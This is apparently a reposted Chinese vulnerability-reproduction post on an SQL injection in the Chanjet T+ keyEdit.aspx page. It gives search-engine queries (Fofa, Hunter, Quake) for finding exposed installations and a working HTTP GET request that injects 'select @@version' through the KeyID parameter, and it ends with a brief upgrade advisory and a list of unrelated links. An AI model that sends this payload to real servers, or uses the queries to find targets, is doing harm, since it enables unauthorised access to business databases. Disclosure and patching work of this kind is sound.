当前位置: 首页 > news >正文

【漏洞复现】畅捷通T+ keyEdit SQL注入漏洞

免责声明:

        本文内容旨在提供有关特定漏洞或安全漏洞的信息,以帮助用户更好地了解可能存在的风险。公布此类信息的目的在于促进网络安全意识和技术进步,并非出于任何恶意目的。阅读者应该明白,在利用本文提到的漏洞信息或进行相关测试时,可能会违反某些法律法规或服务协议。同时,未经授权地访问系统、网络或应用程序可能导致法律责任或其他严重后果。作者不对读者基于本文内容而产生的任何行为或后果承担责任。读者在使用本文所提供的信息时,必须遵守适用法律法规和相关服务协议,并独自承担所有风险和责任。
免责声明

产品简介

畅捷通 T+ 是一款基于互联网的新型企业管理软件,功能模块包括:财务管理、采购管理、库存管理等。主要针对中小型工贸和商贸企业的财务业务一体化应用,融入了社交化、移动化、物联网、电子商务、互联网信息订阅等元素。

漏洞描述

畅捷通T+ keyEdit,aspx 存在SQL注入漏洞,攻击者通过漏洞可以获取服务器数据库权限。

网络空间会测

Fofa

app="畅捷通-TPlus"

Hunter

app.name=="畅捷通 T+"

Quake

app:"畅捷通-TPlus"

image.png

漏洞复现

select @@version

GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.71 Safari/537.1 LBBROWSER
Accept-Encoding: gzip, deflate, br
Connection: close

image.png

修复建议

1、升级到产品到最新版本



关注公众号,获取更多安全资讯:
在这里插入图片描述

相关文章:

  • 机器学习中的监督学习介绍
  • matlab 任意二维图像转点云
  • Windows11和Ubuntu22双系统安装指南
  • C++ virtual public(虚继承类)
  • 从人、机器和环境角度解决智能安全问题
  • 绘制MySQL数据库的实体关系图(ERD)与逻辑模型图
  • 费曼的博士学位论文及下载
  • 前端 CSS 经典:好用的 CSS 选择器
  • 【云】各家云服务器介绍
  • 开源新纪元:ChatTTS——引领对话式文本转语音的新潮流
  • Java学习 - MySQL数据存储过程 + 函数 + 触发器介绍实例
  • ES6 .entries用法
  • WordPress模板推荐
  • python GUI开发: tkinter事件处理的几种方式详解与应用实战
  • 【数据库编程-SQLite3(二)】API-增删改查基础函数-(含源码)
  • 0x05 Python数据分析,Anaconda八斩刀
  • css布局,左右固定中间自适应实现
  • HTTP中的ETag在移动客户端的应用
  • iOS 系统授权开发
  • MYSQL 的 IF 函数
  • niucms就是以城市为分割单位,在上面 小区/乡村/同城论坛+58+团购
  • PAT A1017 优先队列
  • Python 基础起步 (十) 什么叫函数?
  • React-Native - 收藏集 - 掘金
  • SpringBoot 实战 (三) | 配置文件详解
  • Vue学习第二天
  • 前端面试总结(at, md)
  • 前端学习笔记之原型——一张图说明`prototype`和`__proto__`的区别
  • 使用docker-compose进行多节点部署
  • 腾讯优测优分享 | Android碎片化问题小结——关于闪光灯的那些事儿
  • 容器镜像
  • 完善智慧办公建设,小熊U租获京东数千万元A+轮融资 ...
  • ​Spring Boot 分片上传文件
  • !!Dom4j 学习笔记
  • #传输# #传输数据判断#
  • #大学#套接字
  • (C语言)二分查找 超详细
  • (超简单)使用vuepress搭建自己的博客并部署到github pages上
  • (三十)Flask之wtforms库【剖析源码上篇】
  • (转贴)用VML开发工作流设计器 UCML.NET工作流管理系统
  • .dat文件写入byte类型数组_用Python从Abaqus导出txt、dat数据
  • .NET 3.0 Framework已经被添加到WindowUpdate
  • .net core 3.0 linux,.NET Core 3.0 的新增功能
  • .net 中viewstate的原理和使用
  • .Net 中的反射(动态创建类型实例) - Part.4(转自http://www.tracefact.net/CLR-and-Framework/Reflection-Part4.aspx)...
  • .Net转Java自学之路—SpringMVC框架篇六(异常处理)
  • .ui文件相关
  • @开发者,一文搞懂什么是 C# 计时器!
  • [ Algorithm ] N次方算法 N Square 动态规划解决
  • [8-23]知识梳理:文件系统、Bash基础特性、目录管理、文件管理、文本查看编辑处理...
  • [JavaWeb学习] Spring Ioc和DI概念思想
  • [nowCoder] 两个不等长数组求第K大数
  • [one_demo_2]使用正则表达式过滤字符串
  • [opencvsharp]C#基于Fast算法实现角点检测
  • [poj] 3422 Kaka's Matrix Travels || 最小费用最大流